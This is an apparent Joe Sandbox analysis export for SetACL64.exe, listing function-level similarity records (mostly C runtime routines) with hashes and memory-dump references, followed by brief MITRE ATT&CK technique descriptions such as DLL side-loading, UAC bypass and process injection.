Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID: tss
API String ID: 73155330-1638339373
Opcode ID: 7b158194c5e526a4a18f9fad0e2b90092b2974379bf3b45cd8f3baac7b0ba31a
Instruction ID: 96ffc329d5cbe72a17d3959ad0c42b338135958fd9d80b5ae4102a20b6bf837a
Opcode Fuzzy Hash: 7b158194c5e526a4a18f9fad0e2b90092b2974379bf3b45cd8f3baac7b0ba31a
Instruction Fuzzy Hash: 7841EDA2B09A4285EE24DB62984417D62A0EB64BE0F580671EF2DC7BD5EF7CE4919304

Function 00007FF69707747C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF697077526
_CreateFrameInfo.LIBVCRUNTIME ref: 00007FF697077552

Strings

csm, xrefs: 00007FF697077652

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_record
String ID: csm
API String ID: 2558813199-1018135373
Opcode ID: bff377e20215f6bbc56ca34a453ae38d57878f3cd995b74642c36c42e48d33ca
Instruction ID: 0e17a8a05c4ca99439611c2f8d91af93658ad1ac4937e55757a470566f65c201
Opcode Fuzzy Hash: bff377e20215f6bbc56ca34a453ae38d57878f3cd995b74642c36c42e48d33ca
Instruction Fuzzy Hash: 2B515BB2A1874186E670EF25E8406AE77A4FB88BD1F101174EB8DC7B56DF38E460CB41

Function 00007FF69708294C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69708297E

Part of subcall function 00007FF697085054: HeapFree.KERNEL32(?,?,00007FF6970834C7,00007FF697084ADC,?,?,?,00007FF697084E5F,?,?,0000B6CF377E791F,00007FF697085874,?,?,?,00007FF6970857A7), ref: 00007FF69708506A
Part of subcall function 00007FF697085054: GetLastError.KERNEL32(?,?,00007FF6970834C7,00007FF697084ADC,?,?,?,00007FF697084E5F,?,?,0000B6CF377E791F,00007FF697085874,?,?,?,00007FF6970857A7), ref: 00007FF69708507C

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF69707226D), ref: 00007FF69708299C

Strings

C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe, xrefs: 00007FF69708298A

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe
API String ID: 3580290477-2931876395
Opcode ID: aa599a36ba6a0968a49bd794e7a1571458fa8a1e1b45d82a3122116992cc5e68
Instruction ID: f8489bae33473be02e6dce7704c9429af67f19ea06e9c919b099135a65d4b11f
Opcode Fuzzy Hash: aa599a36ba6a0968a49bd794e7a1571458fa8a1e1b45d82a3122116992cc5e68
Instruction Fuzzy Hash: E0416CB6A08A1286EB34DF2598810FD27A5FF44BE4F444075EA4ECBB85DE3EE451C700

Function 00007FF69708E6E0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF69708E7F7
GetLastError.KERNEL32 ref: 00007FF69708E819

Strings

U, xrefs: 00007FF69708E7A3

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: d59aa33b38612ae6739f83d51169c656099beb2d3f667978864e56d4317c1a25
Instruction ID: 79b59f054105815cbd65f2622334bcc9f117e9ea8a5f6ac9e3d7ac7bea1c444b
Opcode Fuzzy Hash: d59aa33b38612ae6739f83d51169c656099beb2d3f667978864e56d4317c1a25
Instruction Fuzzy Hash: AF41A0A2B19A8182EB60CF65E8443AA77A1FB98BD4F544031EE4DC7798EF7DD441C740

Function 00007FF69708BED4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON

Download Yara Rule

APIs

_handle_errorf.LIBCMT ref: 00007FF69708C046

Strings

", xrefs: 00007FF69708BFF1
powf, xrefs: 00007FF69708C03F

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _handle_errorf
String ID: "$powf
API String ID: 2315412904-603753351
Opcode ID: 4c8a7104b5368009bc02c85030aff32139670d494d3475396f94041b1bf7d79b
Instruction ID: 027a7402fc733a45835b210df6a1efc3f1831621ff0727114441475f7591063c
Opcode Fuzzy Hash: 4c8a7104b5368009bc02c85030aff32139670d494d3475396f94041b1bf7d79b
Instruction Fuzzy Hash: 164153B3D18680DAD370CF21E4847AAB7A0F799388F101325F74981994DF7DC5509F44

Function 00007FF69706E1C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF69708DE6C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69708DE8E

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706E2EA

Strings

rt, ccs=UNICODE, xrefs: 00007FF69706E236
wt, ccs=UNICODE, xrefs: 00007FF69706E22D

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_invalid_parameter_noinfo_noreturn
String ID: rt, ccs=UNICODE$wt, ccs=UNICODE
API String ID: 1705651295-2937027470
Opcode ID: 935450736d1db829583b36a6614573cb82d4dc60051ad41040f15e431cbeb578
Instruction ID: 8c74bcc5aa03289aa07e6cfc9237ffca8c7c18263818f8108e16a108f71ddf51
Opcode Fuzzy Hash: 935450736d1db829583b36a6614573cb82d4dc60051ad41040f15e431cbeb578
Instruction Fuzzy Hash: 2131C6B2A18B4282EA70DB19E49422D77A2FB88BD4F500275E79DC7795DF3CE690C700

Function 00007FF69708BDB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

_handle_error.LIBCMT ref: 00007FF69708BEC2

Strings

pow, xrefs: 00007FF69708BEB1
", xrefs: 00007FF69708BE9B

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _handle_error
String ID: "$pow
API String ID: 1757819995-713443511
Opcode ID: 1ec19b026a6bd8f63a67ca0b1a3ee6df7a61ad1018684fb431e5833eb4d51299
Instruction ID: bb4985c548362bf0d9940593cd0a4d6f8484ae2f3e284a0f63622c0b43b083ae
Opcode Fuzzy Hash: 1ec19b026a6bd8f63a67ca0b1a3ee6df7a61ad1018684fb431e5833eb4d51299
Instruction Fuzzy Hash: D03122B2D1CA8586D770CF14E4447AABAB0FBDA388F201326F78996954DF7DD1459B00

Function 00007FF69704AAB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32 ref: 00007FF69704AAE9
LocalFree.KERNEL32 ref: 00007FF69704AB87

Strings

asio.system error, xrefs: 00007FF69704AB74

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: FormatFreeLocalMessage
String ID: asio.system error
API String ID: 1427518018-3828095645
Opcode ID: 10628e73ec9175718b0e5b4b763344832475aea0b876288d78f2d80f17bd1f45
Instruction ID: 1c6c5f8e7e13236475145994a892876a98e4d2318c6dce13b5cbe1f9ad3483e5
Opcode Fuzzy Hash: 10628e73ec9175718b0e5b4b763344832475aea0b876288d78f2d80f17bd1f45
Instruction Fuzzy Hash: A12191B2A08B9182F7258F15E58032A7BA6F751BE0F444275DB9983BD5DF7CD0A1CB40

Function 00007FF69706CE00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60timeCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF69706CEAA
GetLocalTime.KERNEL32 ref: 00007FF69706CED1

Strings

%04d-%02d-%02d %02d-%02d-%02d-%03d, xrefs: 00007FF69706CED7

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: CloseHandleLocalTime
String ID: %04d-%02d-%02d %02d-%02d-%02d-%03d
API String ID: 655981579-2017722003
Opcode ID: daa5ccae675e1664e87c3d862e659ce2e173f1fd8162f8e579eca52e1a44dbca
Instruction ID: dc35007935734b7a0326f008ec2197793a12287e82d476bd0982dc83fd116686
Opcode Fuzzy Hash: daa5ccae675e1664e87c3d862e659ce2e173f1fd8162f8e579eca52e1a44dbca
Instruction Fuzzy Hash: 5A31D832A14B81D9E7208F71E8807DC3BB4FB4479CF205128EE8967B28DF3892A5D344

Function 00007FF69708A688 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_set_errno_from_matherr.LIBCMT ref: 00007FF69708A734
_set_errno_from_matherr.LIBCMT ref: 00007FF69708A748

Strings

exp, xrefs: 00007FF69708A6AF

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _set_errno_from_matherr
String ID: exp
API String ID: 1187470696-113136155
Opcode ID: d9922d9e5b80ecf97583ad5356538061466fbce9c40230637d87b0462a7541d6
Instruction ID: 8b0761a452add81a84e63a3272a7b93d8ceb5ff3a64c708acf4d2c173a7b8847
Opcode Fuzzy Hash: d9922d9e5b80ecf97583ad5356538061466fbce9c40230637d87b0462a7541d6
Instruction Fuzzy Hash: 4E211DB6A1D6858BD770DF28A4412AAB3A0FB89380F505575F69DC2B59EF3DE4009F00

Function 00007FF6970880C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF6970880FD
LCMapStringW.KERNEL32 ref: 00007FF697088185

Strings

LCMapStringEx, xrefs: 00007FF6970880F1

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 87cf0034b0fcd9c54c61c9bab6167fa2d33436d6331be54f9b1c0558e02e15ee
Instruction ID: 53c9c7c12e6e4dd2bd7ba04a88be66d90acb940e9b2c8b86f47aecaec7c4dd35
Opcode Fuzzy Hash: 87cf0034b0fcd9c54c61c9bab6167fa2d33436d6331be54f9b1c0558e02e15ee
Instruction Fuzzy Hash: 3011F776A08B8186DB64CB56B4402AAB7A5FBC9BD0F54417AEA8DC3B59DF3CD4408B40

Function 00007FF697074C18 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF697071032), ref: 00007FF697074C5C
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF697071032), ref: 00007FF697074CA2

Strings

csm, xrefs: 00007FF697074C8F

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 926c8d61ae619e4cea6d38c76edcc3f0fce93d5721c54efb26694986da39f2c5
Instruction ID: 097ac2ed5d0ebb0a58db8aa2dbc7ccc1d9ad7c096ccf9affbb3707136346339b
Opcode Fuzzy Hash: 926c8d61ae619e4cea6d38c76edcc3f0fce93d5721c54efb26694986da39f2c5
Instruction Fuzzy Hash: 25114F72618B4582EB618F15E84026DB7E1FB98BD4F584270EE8D87B64DF3CD551CB00

Function 00007FF697031080 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00007FF697031086
GetLastError.KERNEL32 ref: 00007FF697031098

Strings

tss, xrefs: 00007FF6970310CE

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: AllocErrorLast
String ID: tss
API String ID: 4252645092-1638339373
Opcode ID: cd5b0d93fa60f5d47108ff5205c10caaa5c25c736dacc53fbb88ac9913f15d10
Instruction ID: 3682be5ea63bb464cd65783881d02fa6c80742393b09cdef4187c53f5331fe61
Opcode Fuzzy Hash: cd5b0d93fa60f5d47108ff5205c10caaa5c25c736dacc53fbb88ac9913f15d10
Instruction Fuzzy Hash: 4001A2A5E09A4782E630AB34A88507962B0FFA8394F900271D65DC27E4EE7CE5458600

Function 00007FF697031300 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00007FF697031306
GetLastError.KERNEL32 ref: 00007FF697031318

Strings

tss, xrefs: 00007FF69703134E

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: AllocErrorLast
String ID: tss
API String ID: 4252645092-1638339373
Opcode ID: 1bc407a74f966e2ffa7869833deab5959a39b40ad1bf5c22f53a82972e40eb05
Instruction ID: a4e490359672da74ea046f0bf74ce4b888cd145bbdd049df7db10a6663342680
Opcode Fuzzy Hash: 1bc407a74f966e2ffa7869833deab5959a39b40ad1bf5c22f53a82972e40eb05
Instruction Fuzzy Hash: D2F0F9F5A09A4282E7309B24A89507963B1FF687E4FA405B1D69EC2AE5EF3CE544D600

Function 00007FF697087F98 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF697087FC9
InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,-00000018,00007FF6970917EE,?,?,?,00007FF6970916E6,?,?,?,00007FF6970937A6), ref: 00007FF697087FE3

Strings

InitializeCriticalSectionEx, xrefs: 00007FF697087FBD

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 273a775c745aa4887cae5f520df46ef069811a822fa02b34b0a2512bd747f2e6
Instruction ID: 9953a68bcba4b172d311e39ce0c01de33456a870dda4c3544b7a6772018889af
Opcode Fuzzy Hash: 273a775c745aa4887cae5f520df46ef069811a822fa02b34b0a2512bd747f2e6
Instruction Fuzzy Hash: 6DF089A5F0874191F7248B92F4444A96321EF88BD0F4450B5D94DC7B59CF3DE445C740

Function 00007FF697087E5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF697087E85
TlsSetValue.KERNEL32(?,?,0000B6CF377E791F,00007FF69708402A,?,?,0000B6CF377E791F,00007FF69707E201,?,?,?,?,00007FF69708BCFA,?,?,00000000), ref: 00007FF697087E9C

Strings

FlsSetValue, xrefs: 00007FF697087E72

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 338cb8ce972258a4f0b821b8ea037a51c1abbc8605fb70ebcfd02633c2e470e7
Instruction ID: 366f26a6d6813fc7ca50ccfc22a367cd83c87f5b6a47526237a99d9c159fff99
Opcode Fuzzy Hash: 338cb8ce972258a4f0b821b8ea037a51c1abbc8605fb70ebcfd02633c2e470e7
Instruction Fuzzy Hash: A0E065E1A0864291EA289B91F4545F96262EF887D0F985076D94DC6364CE3DE884C300

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

